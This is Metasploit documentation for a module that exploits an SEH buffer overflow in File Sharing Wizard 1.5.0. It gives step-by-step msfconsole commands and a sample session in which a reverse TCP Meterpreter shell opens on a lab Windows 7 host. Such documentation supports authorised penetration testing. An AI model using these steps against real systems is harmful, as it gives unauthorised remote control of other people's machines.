metasploit-gs/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md

Description

This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.

Vulnerable Application

This module has been tested successfully on:

• Windows 7 x86 SP1

The application installer is linked below

File Sharing Wizard Installer

Once installed run the application and click "Start" to enable the server.

Verification Steps

1. Start msfconsole
2. Do: use exploits/windows/http/file_sharing_wizard_seh
3. Do: set rhosts [IP]
4. Do: run
5. Your payload should get executed

Scenarios

msf5 > use exploit/windows/http/file_sharing_wizard_seh
msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.101:80 - Connecting to target
[*] 192.168.56.101:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100

meterpreter > sysinfo
Computer        : TARGET
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >